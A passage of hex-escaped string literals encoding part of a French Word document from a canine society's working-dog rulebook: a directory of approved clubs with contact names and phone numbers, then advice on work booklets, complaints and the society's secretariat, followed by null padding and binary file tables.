+"\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x2e\x0d\x0d\x09"
+"\x43\x68\x61\x75\x76\x69\x6e\x69\x73\x6d\x65\x3a\x0d\x56\x6f\x74"
+"\x72\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x6e\x65\x20\x73\x65"
+"\x72\x61\x20\x70\x61\x73\x20\x66\x6f\x72\x63\x65\x6d\x65\x6e\x74"
+"\x20\x6c\x65\x20\x70\x6c\x75\x73\x20\x72\x61\x70\x69\x64\x65\x2c"
+"\x20\x6d\x61\x69\x73\x20\x70\x6f\x75\x72\x20\x76\x6f\x75\x73\x2c"
+"\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x6c\x65\x20\x70\x6c\x75\x73"
+"\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x2c\x20\x6c\x65"
+"\x20\x70\x6c\x75\x73\x20\x62\x65\x61\x75\x2c\x20\x6c\x65\x20\x70"
+"\x6c\x75\x73\x20\x67\x65\x6e\x74\x69\x6c\x2e\x20\x4e\x27\x61\x64"
+"\x6d\x65\x74\x74\x65\x7a\x20\x70\x61\x73\x20\x71\x75\x27\x6f\x6e"
+"\x20\x6c\x65\x20\x64\xe9\x6e\x69\x67\x72\x65\x2c\x20\x70\x61\x73"
+"\x20\x70\x6c\x75\x73\x20\x71\x75\x65\x20\x73\x6f\x6e\x20\xe9\x6c"
+"\x65\x76\x65\x75\x72\x20\x6f\x75\x20\x73\x6f\x6e\x20\x63\x6c\x75"
+"\x62\x2e\x20\x4e\x65\x20\x6c\x65\x20\x66\x61\x69\x74\x65\x73\x20"
+"\x70\x61\x73\x20\x70\x6f\x75\x72\x20\x6c\x65\x73\x20\x61\x75\x74"
+"\x72\x65\x73\x2e\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d"
+"\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d"
+"\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x41\x20\x71\x75\x69"
+"\x20\x76\x6f\x75\x73\x20\x61\x64\x72\x65\x73\x73\x65\x72\x20\x3f"
+"\x0d\x50\x6f\x75\x72\x20\x74\x6f\x75\x74\x20\x72\x65\x6e\x73\x65"
+"\x69\x67\x6e\x65\x6d\x65\x6e\x74\x20\x74\x65\x63\x68\x6e\x69\x71"
+"\x75\x65\x20\x6f\x75\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61"
+"\x74\x69\x66\x20\x3a\x09\x41\x20\x76\x6f\x74\x72\x65\x20\x63\x6c"
+"\x75\x62\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x61\x67"
+"\x72\xe9\xe9\x20\x3a\x0d\x0d\x36\x38\x07\x41\x4c\x53\x41\x43\x45"
+"\x07\x4d\x6d\x65\x20\x53\x63\x68\x65\x72\x72\x65\x72\x07\x30\x33"
+"\x2e\x38\x39\x2e\x34\x30\x2e\x35\x39\x2e\x31\x30\x07\x42\x65\x74"
+"\x74\x65\x6e\x64\x6f\x72\x66\x07\x50\x56\x4c\x07\x07\x37\x36\x07"
+"\x41\x43\x43\x4c\x07\x4d\x2e\x20\x47\x61\x72\x72\x61\x75\x6c\x74"
+"\x07\x30\x32\x2e\x33\x35\x2e\x34\x34\x2e\x38\x31\x2e\x36\x33\x07"
+"\x4d\x61\x6e\x6e\x65\x76\x69\x6c\x65\x74\x74\x65\x07\x45\x4e\x43"
+"\x07\x07\x36\x36\x07\x41\x43\x4c\x53\x07\x4d\x6d\x65\x20\x4d\x61"
+"\x73\x61\x6e\x61\x07\x30\x34\x2e\x36\x38\x2e\x39\x32\x2e\x37\x32"
+"\x2e\x34\x30\x07\x50\x65\x72\x70\x69\x67\x6e\x61\x6e\x07\x50\x56"
+"\x4c\x20\x2b\x20\x45\x4e\x43\x07\x07\x31\x32\x07\x41\x43\x4c\x41"
+"\x43\x54\x41\x07\x4d\x2e\x20\x47\x61\x79\x72\x61\x72\x64\x07\x30"
+"\x35\x2e\x36\x35\x2e\x36\x33\x2e\x33\x36\x2e\x33\x32\x07\x43\x72"
+"\x61\x6e\x73\x61\x63\x20\x6c\x65\x73\x20\x54\x65\x72\x6d\x65\x73"
+"\x07\x45\x4e\x43\x07\x07\x39\x34\x07\x41\x53\x4c\x4c\x07\x4d\x6d"
+"\x65\x20\x41\x6e\x73\x61\x6c\x64\x69\x20\x4a\x61\x63\x71\x75\x65"
+"\x74\x07\x30\x31\x2e\x36\x39\x2e\x33\x31\x2e\x30\x35\x2e\x36\x39"
+"\x07\x4e\x65\x75\x69\x6c\x6c\x79\x20\x73\x75\x72\x20\x4d\x61\x72"
+"\x6e\x65\x07\x45\x6e\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e\x74\x73"
+"\x07\x07\x39\x30\x07\x43\x43\x43\x07\x4d\x6d\x65\x20\x4c\x69\x6e"
+"\x64\x65\x6b\x65\x72\x07\x30\x33\x2e\x38\x34\x2e\x32\x39\x2e\x30"
+"\x31\x2e\x37\x31\x07\x42\x65\x6c\x66\x6f\x72\x74\x07\x37\x56\x4c"
+"\x07\x07\x34\x34\x07\x43\x43\x43\x41\x07\x4d\x2e\x20\x4d\x61\x67"
+"\x72\xe9\x07\x30\x32\x2e\x34\x30\x2e\x38\x38\x2e\x38\x39\x2e\x38"
+"\x38\x07\x48\x65\x72\x62\x69\x67\x6e\x61\x63\x07\x50\x56\x4c\x07"
+"\x07\x37\x31\x07\x43\x43\x4c\x42\x07\x4d\x2e\x20\x42\x6f\x75\x72"
+"\x61\x73\x73\x65\x74\x07\x30\x34\x2e\x37\x34\x2e\x35\x35\x2e\x31"
+"\x33\x2e\x30\x34\x07\x4d\xe2\x63\x6f\x6e\x07\x50\x56\x4c\x07\x07"
+"\x32\x36\x07\x43\x43\x4c\x56\x07\x4d\x6c\x6c\x65\x20\x4c\x6f\x6d"
+"\x62\x61\x72\x64\x07\x30\x34\x2e\x37\x35\x2e\x38\x33\x2e\x37\x32"
+"\x2e\x38\x32\x07\x56\x61\x6c\x65\x6e\x63\x65\x07\x45\x6e\x74\x72"
+"\x61\x69\x6e\x74\x73\x20\x50\x56\x4c\x07\x07\x31\x36\x07\x43\x45"
+"\x19\x43\x07\x4d\x6d\x65\x20\x4c\x61\x6c\x65\x6d\x65\x6e\x64\x07"
+"\x30\x35\x2e\x34\x35\x2e\x36\x37\x2e\x39\x35\x2e\x38\x31\x07\x4d"
+"\x61\x6e\x73\x6c\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x32"
+"\x39\x07\x43\x4c\x41\x4d\x07\x4d\x2e\x20\x4c\x65\x67\x75\x65\x73"
+"\x67\x75\x65\x07\x30\x32\x2e\x39\x38\x2e\x37\x32\x2e\x34\x34\x2e"
+"\x34\x32\x07\x4d\x6f\x72\x6c\x61\x69\x78\x07\x50\x56\x4c\x07\x07"
+"\x33\x33\x07\x43\x4c\x43\x07\x4d\x6c\x6c\x65\x20\x4d\x6f\x6e\x69"
+"\x6f\x74\x07\x30\x36\x2e\x30\x37\x2e\x33\x37\x2e\x37\x33\x2e\x31"
+"\x39\x07\x53\x74\x20\x44\x65\x6e\x69\x73\x20\x64\x65\x20\x50\x69"
+"\x6c\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x36\x32\x07\x43"
+"\x4c\x43\x41\x07\x4d\x2e\x20\x42\x65\x6e\x6f\x69\x74\x07\x30\x33"
+"\x2e\x32\x31\x2e\x31\x32\x2e\x37\x30\x2e\x33\x30\x07\x41\x69\x72"
+"\x20\x73\x2f\x4c\x79\x73\x07\x45\x4e\x43\x07\x07\x37\x38\x07\x43"
+"\x4c\x43\x49\x46\x07\x4d\x2e\x20\x4c\x65\x66\xe8\x76\x72\x65\x07"
+"\x30\x32\x2e\x33\x32\x2e\x33\x38\x2e\x34\x36\x2e\x32\x33\x07\x4d"
+"\x65\x75\x6c\x61\x6e\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x34"
+"\x30\x07\x43\x55\x4c\x43\x4c\x07\x4d\x2e\x20\x4c\x75\x63\x61\x6e"
+"\x74\x6f\x6e\x69\x6f\x07\x30\x35\x2e\x36\x32\x2e\x34\x35\x2e\x30"
+"\x33\x2e\x35\x31\x07\x4d\x6f\x6e\x74\x20\x64\x65\x20\x4d\x61\x72"
+"\x73\x61\x6e\x07\x45\x4e\x43\x2b\x45\x6e\x74\x72\x2e\x50\x56\x4c"
+"\x07\x07\x37\x32\x07\x43\x4c\x43\x4d\x07\x4d\x2e\x20\x46\x65\x6c"
+"\x64\x65\x72\x07\x30\x36\x2e\x38\x32\x2e\x33\x39\x2e\x37\x32\x2e"
+"\x36\x35\x07\x50\x61\x72\x69\x67\x6e\xe9\x20\x6c\x27\x45\x76\xea"
+"\x71\x75\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x33\x38\x07"
+"\x43\x4c\x44\x53\x07\x4d\x6d\x65\x20\x43\x61\x69\x6c\x6c\x61\x74"
+"\x07\x30\x34\x2e\x37\x36\x2e\x36\x38\x2e\x32\x39\x2e\x39\x35\x07"
+"\x56\x69\x7a\x69\x6c\x6c\x65\x07\x50\x56\x4c\x07\x07\x37\x37\x07"
+"\x43\x4c\x43\x42\x07\x4d\x6d\x65\x20\x50\x61\x69\x6c\x6c\x65\x74"
+"\x07\x30\x31\x2e\x36\x34\x2e\x30\x36\x2e\x36\x38\x2e\x31\x34\x07"
+"\x4c\x69\x76\x65\x72\x64\x79\x07\x45\x4e\x43\x07\x07\x33\x37\x07"
+"\x43\x4c\x53\x54\x07\x4d\x6c\x6c\x65\x20\x4d\x61\x73\x73\x61\x07"
+"\x30\x32\x2e\x34\x37\x2e\x39\x34\x2e\x37\x38\x2e\x38\x32\x07\x54"
+"\x6f\x75\x72\x73\x07\x50\x56\x4c\x07\x07\x37\x32\x07\x43\x4c\x55"
+"\x42\x07\x4d\x2e\x20\x46\x65\x75\x76\x72\x69\x65\x72\x07\x30\x32"
+"\x2e\x34\x33\x2e\x32\x30\x2e\x35\x36\x2e\x32\x36\x07\x4c\x61\x20"
+"\x43\x68\x61\x70\x65\x6c\x6c\x65\x20\x53\x74\x20\x46\x72\x61\x79"
+"\x07\x50\x56\x4c\x07\x07\x33\x31\x07\x43\x4c\x4d\x50\x07\x4d\x2e"
+"\x20\x4d\x61\x67\x72\x65\x74\x07\x30\x35\x20\x36\x33\x20\x32\x36"
+"\x20\x34\x33\x20\x30\x38\x07\x4d\x6f\x6e\x74\x61\x75\x62\x61\x6e"
+"\x07\x45\x4e\x43\x07\x07\x36\x33\x07\x43\x4c\x53\x43\x41\x42\x07"
+"\x4d\x6d\x65\x20\x4d\x69\x6e\x65\x74\x2d\x42\x61\x72\x64\x6f\x74"
+"\x07\x30\x34\x2e\x37\x30\x2e\x30\x36\x2e\x30\x39\x2e\x33\x37\x07"
+"\x54\x68\x69\x65\x72\x73\x07\x45\x4e\x43\x07\x07\x30\x33\x07\x52"
+"\x43\x4c\x59\x07\x4d\xa0\x2e\x47\x61\x77\x6c\x61\x73\x20\x52\x69"
+"\x63\x68\x61\x72\x64\x07\x07\x59\x7a\x65\x75\x72\x65\x07\x53\x74"
+"\x61\x67\x65\x2d\x65\x6e\x74\x72\x2e\x20\x45\x4e\x43\x07\x07\x36"
+"\x34\x07\x43\x50\x4c\x53\x07\x4d\x6d\x65\x20\x47\x72\x6f\x6c\x65"
+"\x74\x07\x30\x35\x2e\x35\x39\x2e\x30\x36\x2e\x32\x35\x2e\x35\x37"
+"\x07\x50\x61\x75\x07\x45\x6e\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e"
+"\x74\x73\x07\x07\x37\x30\x07\x4c\x43\x41\x07\x4d\x6d\x65\x2e\x20"
+"\x47\x69\x72\x61\x72\x64\x07\x30\x33\x2e\x38\x34\x2e\x37\x36\x2e"
+"\x30\x35\x2e\x39\x31\x07\x4c\x61\x66\x65\x72\x74\xe9\x20\x73\x2f"
+"\x61\x6d\x61\x6e\x63\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07"
+"\x30\x33\x07\x52\x43\x4c\x43\x07\x4d\x2e\x20\x4d\x6f\x6e\x65\x74"
+"\x07\x30\x34\x2e\x37\x30\x2e\x35\x31\x2e\x37\x30\x2e\x34\x31\xa4"
+"\x4d\x6f\x6e\x74\x6d\x61\x72\x61\x75\x6c\x74\x07\x50\x56\x4c\x07"
+"\x07\x36\x39\x07\x52\x43\x52\x07\x4d\x6d\x65\x20\x4f\x70\x69\x6e"
+"\x65\x6c\x07\x30\x34\x2e\x37\x32\x2e\x38\x38\x2e\x32\x39\x2e\x32"
+"\x36\x07\x43\x68\x61\x74\x69\x6c\x6c\x6f\x6e\x20\x4c\x61\x50\x61"
+"\x6c\x75\x64\x07\x45\x4e\x43\x07\x07\x31\x33\x07\x54\x43\x50\x4c"
+"\x43\x07\x4d\x2e\x20\x43\x72\x6f\x69\x6e\x07\x30\x34\x2e\x39\x30"
+"\x2e\x33\x38\x2e\x38\x35\x2e\x30\x30\x07\x4d\x6f\x6e\x74\x65\x75"
+"\x78\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x32\x39\x07\x41\x4c"
+"\x50\x43\x07\x4d\x6d\x65\x20\x51\x75\xe9\x61\x75\x07\x30\x32\x2e"
+"\x39\x38\x2e\x37\x38\x2e\x34\x34\x2e\x31\x37\x07\x50\x6c\x65\x79"
+"\x62\x65\x72\x2d\x43\x68\x72\x69\x73\x74\x07\x45\x4e\x43\x07\x07"
+"\x35\x34\x07\x43\x43\x4c\x07\x4d\x2e\x20\x4d\x6f\x72\x69\x6e\x65"
+"\x61\x75\x20\x52\x6f\x6e\x61\x6e\x07\x30\x33\x2e\x32\x39\x2e\x33"
+"\x38\x2e\x38\x35\x2e\x33\x38\x07\x4e\x61\x6e\x63\x79\x07\x53\x74"
+"\x61\x67\x65\x20\x2d\x45\x6e\x74\x2e\x20\x50\x56\x4c\x07\x07\x38"
+"\x38\x07\x43\x4c\x56\x4d\x07\x4d\x2e\x20\x53\x65\x72\x67\x65\x20"
+"\x48\x65\x69\x6d\x6c\x69\x63\x68\x07\x30\x33\x2e\x38\x37\x2e\x36"
+"\x34\x2e\x35\x32\x2e\x32\x30\x07\x4a\x65\x61\x6e\x6d\x65\x6e\x69"
+"\x6c\x07\x50\x56\x4c\x07\x07\x37\x38\x07\x4e\x41\x4c\x4c\x07\x4d"
+"\x6d\x65\x20\x54\x75\x6d\x61\x07\x30\x31\x2e\x33\x34\x2e\x36\x32"
+"\x2e\x34\x30\x2e\x31\x33\x07\x53\x6f\x69\x73\x73\x6f\x6e\x73\x07"
+"\x45\x4e\x43\x07\x07\x31\x33\x07\x43\x41\x4c\x43\x07\x4d\x2e\x20"
+"\x42\xe9\x72\x65\x6e\x67\x65\x72\x07\x30\x34\x2e\x34\x32\x2e\x30"
+"\x33\x2e\x30\x31\x2e\x39\x31\x07\x4f\x72\x61\x69\x73\x6f\x6e\x07"
+"\x45\x4e\x43\x07\x07\x33\x36\x07\x43\x4c\x53\x33\x36\x07\x4d\x2e"
+"\x20\x54\x69\x73\x73\x65\x75\x72\x07\x30\x32\x2e\x35\x34\x2e\x32"
+"\x37\x2e\x37\x31\x2e\x33\x35\x07\x43\x68\x61\x74\x65\x61\x75\x72"
+"\x6f\x75\x78\x07\x20\x50\x56\x4c\x07\x07\x38\x36\x07\x43\x4c\x53"
+"\x4c\x07\x4d\x2e\x20\x42\x69\x6c\x6c\x61\x72\x64\x07\x30\x35\x2e"
+"\x34\x39\x2e\x35\x38\x2e\x31\x39\x2e\x38\x38\x07\x50\x6f\x69\x74"
+"\x69\x65\x72\x73\x07\x53\x74\x61\x67\x65\x20\x50\x56\x4c\x2d\x45"
+"\x4e\x43\x07\x07\x36\x36\x07\x33\x43\x4c\x07\x4d\x2e\x20\x4c\x61"
+"\x66\x6f\x6e\x74\x07\x30\x34\x2e\x36\x38\x2e\x36\x31\x2e\x30\x30"
+"\x2e\x34\x38\x07\x50\x65\x72\x70\x69\x67\x6e\x61\x6e\x07\x45\x6e"
+"\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e\x74\x73\x07\x07\x0d\x56\x6f"
+"\x75\x73\x20\x70\x6f\x75\x72\x72\x65\x7a\x20\x76\x6f\x75\x73\x20"
+"\x70\x72\x6f\x63\x75\x72\x65\x72\x20\x6c\x65\x73\x20\x61\x64\x72"
+"\x65\x73\x73\x65\x73\x20\x64\x65\x20\x63\x65\x73\x20\x63\x6c\x75"
+"\x62\x73\x20\xe0\x20\x76\x6f\x74\x72\x65\x20\x53\x6f\x63\x69\xe9"
+"\x74\xe9\x20\x43\x61\x6e\x69\x6e\x65\x20\x52\xe9\x67\x69\x6f\x6e"
+"\x61\x6c\x65\x20\x6f\x75\x20\x4c\x6f\x63\x61\x6c\x65\x2c\x20\x6f"
+"\x75\x20\xe0\x20\x6c\x61\x20\x53\x43\x43\x2c\x20\x6f\x75\x20\x61"
+"\x75\x20\x73\x65\x63\x72\xe9\x74\x61\x72\x69\x61\x74\x20\x64\x65"
+"\x20\x6c\x61\x20\x43\x2e\x4c\x0d\x53\x69\x20\x76\x6f\x75\x73\x20"
+"\x61\x76\x65\x7a\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x64\x75\x20"
+"\x74\x65\x6d\x70\x73\x20\x64\x69\x73\x70\x6f\x6e\x69\x62\x6c\x65"
+"\x2c\x20\x70\x72\x6f\x70\x6f\x73\x65\x7a\x2d\x76\x6f\x75\x73\x20"
+"\x70\x6f\x75\x72\x20\x61\x69\x64\x65\x72\x20\xe0\x20\x65\x6e\x74"
+"\x72\x65\x74\x65\x6e\x69\x72\x20\x6c\x61\x20\x70\x69\x73\x74\x65"
+"\x2c\x20\x61\x73\x73\x75\x6d\x65\x72\x20\x61\x63\x63\x75\x65\x69"
+"\x6c\x20\x65\x74\x20\x73\x65\x63\x72\xe9\x74\x61\x72\x69\x61\x74"
+"\x2c\x20\x61\x69\x64\x65\x72\x20\x61\x75\x78\x20\x65\x6e\x74\x72"
+"\x61\xee\x6e\x65\x6d\x65\x6e\x74\x73\x20\x65\x74\x20\xe9\x70\x72"
+"\x65\x75\x76\x65\x73\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x6c\x65"
+"\x73\x2e\x20\x4c\x65\x20\x73\x70\x6f\x72\x74\x20\x6c\xe9\x76\x72"
+"\x69\x65\x72\x20\x65\x78\x69\x73\x74\x65\x20\x70\x6f\x75\x72\x20"
+"\x76\x6f\x75\x73\x20\x6d\x61\x69\x73\x20\x61\x20\x62\x65\x73\x6f"
+"\x69\x6e\x20\x64\x65\x20\x76\x6f\x75\x73\x2e\x0d\x4e\x27\x6f\x75"
+"\x62\x6c\x69\x65\x7a\x20\x70\x61\x73\x20\x71\x75\x65\x20\x6c\x65"
+"\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x53\x2e\x43\x2e\x43"
+"\x2e\x20\x6f\x6e\x74\x20\x70\x6f\x75\x72\x20\x62\x75\x74\x20\x6c"
+"\x27\x61\x6d\xe9\x6c\x69\x6f\x72\x61\x74\x69\x6f\x6e\x20\x64\x65"
+"\x73\x20\x72\x61\x63\x65\x73\x20\x64\x61\x6e\x73\x20\x75\x6e\x20"
+"\x65\x73\x70\x72\x69\x74\x20\x61\x6d\x69\x63\x61\x6c\x20\x65\x74"
+"\x20\x6e\x6f\x6e\x20\x6c\x65\x20\x73\x65\x75\x6c\x20\x70\x6c\x61"
+"\x69\x73\x69\x72\x20\x64\x65\x20\x6c\x61\x20\x63\x6f\x6d\x70\xe9"
+"\x74\x69\x74\x69\x6f\x6e\x20\x6d\xea\x6d\x65\x20\x73\x27\x69\x6c"
+"\x20\x65\x73\x74\x20\x72\xe9\x65\x6c\x2e\x0d\x50\x6f\x75\x72\x20"
+"\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x20\x63\x61\x72\x6e\x65"
+"\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x3a\x0d\x41"
+"\x20\x6c\x61\x20\x53\x2e\x43\x2e\x43\x2e\x20\x96\x20\x73\x65\x72"
+"\x76\x69\x63\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65\x20\x74"
+"\x72\x61\x76\x61\x69\x6c\x20\x2d\x20\x20\x65\x6e\x20\x70\x72\xe9"
+"\x63\x69\x73\x61\x6e\x74\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65"
+"\x20\x63\x6f\x75\x72\x73\x65\x20\x6f\x75\x20\x64\x65\x20\x70\x6f"
+"\x75\x72\x73\x75\x69\x74\x65\x2c\x20\x61\x63\x63\x6f\x6d\x70\x61"
+"\x67\x6e\xe9\x20\x64\x75\x20\x70\x72\x69\x78\x2e\x0d\x0d\x50\x6f"
+"\x75\x72\x20\x74\x6f\x75\x74\x65\x20\x72\xe9\x63\x6c\x61\x6d\x61"
+"\x74\x69\x6f\x6e\x20\x6f\x75\x20\x6c\x69\x74\x69\x67\x65\x20\x65"
+"\x74\x20\x73\x75\x67\x67\x65\x73\x74\x69\x6f\x6e\x20\x73\x75\x72"
+"\x20\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x3a\x0d\x41"
+"\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x6f\x75\x20\x73"
+"\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20\x64\x65\x20\x6c\x61\x20"
+"\x43\x2e\x4c\x2e\x2c\x20\x64\x69\x72\x65\x63\x74\x65\x6d\x65\x6e"
+"\x74\x20\x6f\x75\x20\x76\x69\x61\x20\x6c\x61\x20\x53\x2e\x43\x2e"
+"\x43\x2e\x0d\x0d\x50\x6f\x75\x72\x20\x74\x6f\x75\x74\x65\x20\x68"
+"\x6f\x6d\x6f\x6c\x6f\x67\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x74"
+"\x69\x74\x72\x65\x20\x61\x75\x20\x64\x6f\x73\x73\x69\x65\x72\x20"
+"\x3a\x0d\x41\x75\x20\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20"
+"\x64\x65\x20\x6c\x61\x20\x43\x2e\x4c\x2e\x20\x64\x69\x72\x65\x63"
+"\x74\x65\x6d\x65\x6e\x74\x20\x6f\x75\x20\x76\x69\x61\x20\x6c\x61"
+"\x20\x53\x2e\x43\x2e\x43\x2e\x20\x61\x70\x72\xe8\x73\x20\x61\x76"
+"\x6f\x69\x72\x20\x76\xe9\x72\x69\x66\x69\xe9\x20\x6c\x65\x73\x20"
+"\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x61\x75\x70\x72\xe8"
+"\x73\x20\x64\x65\x20\x76\x6f\x74\x72\x65\x20\x63\x6c\x75\x62\x2e"
+"\x20\x53\x65\x75\x6c\x73\x20\x6c\x65\x73\x20\x64\x6f\x73\x73\x69"
+"\x65\x72\x73\x20\x63\x65\x72\x74\x69\x66\x69\xe9\x73\x20\x63\x6f"
+"\x6e\x66\x6f\x72\x6d\x65\x73\x20\x70\x61\x72\x20\x6c\x65\x73\x20"
+"\x72\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x73\x20\x64\x65\x73"
+"\x20\x43\x6c\x75\x62\x73\x20\x73\x65\x72\x6f\x6e\x74\x20\x61\x63"
+"\x63\x65\x70\x74\xe9\x73\x2e\x0d\x0d\x50\x6f\x75\x72\x20\x74\x6f"
+"\x75\x74\x65\x20\x71\x75\x65\x73\x74\x69\x6f\x6e\x20\x72\x65\x6c"
+"\x61\x74\x69\x76\x65\x20\xe0\x20\x6c\x61\x20\x63\x6f\x6e\x66\x69"
+"\x72\x6d\x61\x74\x69\x6f\x6e\x20\x3a\x0d\x41\x75\x20\x50\x72\xe9"
+"\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x43\x6c\x75\x62\x20\x64"
+"\x65\x20\x72\x61\x63\x65\x20\x63\x6f\x6e\x63\x65\x72\x6e\xe9\x2e"
+"\x0d\x4c\x69\x76\x72\x65\x74\x20\xe9\x74\x61\x62\x6c\x69\x20\x70"
+"\x61\x72\x20\x6c\x65\x20\x50\x72\x6f\x66\x65\x73\x73\x65\x75\x72"
+"\x20\x47\x75\x79\x20\x51\x55\x45\x49\x4e\x4e\x45\x43\x2e\x0d\x4d"
+"\x69\x73\x65\x20\xe0\x20\x6a\x6f\x75\x72\x20\x32\x30\x30\x36\x0d"
+"\x50\x61\x67\x65\x20\x13\x20\x50\x41\x47\x45\x20\x14\x39\x15\x20"
+"\x73\x75\x72\x20\x39\x0d\x50\x2e\x4d\x2f\x20\x4c\x2e\x50\x20\x96"
+"\x20\x31\x35\x2f\x30\x32\x0d\x0d\x0d\x0d\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x06\x00\x00\x2d\x08\x00\x00\x6d\x08\x00\x00\x6e\x08\x00\x00"
+"\x80\x08\x00\x00\x43\x09\x00\x00\x51\x09\x00\x00\x79\x09\x00\x00"
+"\x81\x09\x00\x00\xf5\x0a\x00\x00\x10\x0b\x00\x00\x33\x0b\x00\x00"
+"\x66\x0b\x00\x00\x63\x0d\x00\x00\x8a\x0d\x00\x00\xbd\x0e\x00\x00"
+"\xf6\x0e\x00\x00\x98\x10\x00\x00\xb4\x10\x00\x00\x3a\x12\x00\x00"
+"\x45\x12\x00\x00\x7f\x1b\x00\x00\x90\x1b\x00\x00\x11\x1c\x00\x00"
+"\x15\x1c\x00\x00\x5e\x1d\x00\x00\x68\x1d\x00\x00\x6a\x1d\x00\x00"
+"\x5f\x20\x00\x00\x61\x20\x00\x00\xa1\x20\x00\x00\xb3\x20\x00\x00"
+"\x71\x23\x00\x00\x8d\x23\x00\x00\x3b\x26\x00\x00\x3d\x26\x00\x00"
+"\x6a\x2b\x00\x00\x87\x2b\x00\x00\x88\x2b\x00\x00\x9b\x2b\x00\x00"
+"\x42\x2c\x00\x00\x59\x2c\x00\x00\xdb\x3b\x00\x00\xe6\x3b\x00\x00"
+"\x77\x3c\x00\x00\x85\x3c\x00\x00\x0a\x40\x00\x00\x18\x40\x00\x00"
+"\x19\x40\x00\x00\x6c\x41\x00\x00\x74\x41\x00\x00\x75\x41\x00\x00"
+"\x80\x41\x00\x00\x81\x41\x00\x00\xe6\x41\x00\x00\xf0\x41\x00\x00"
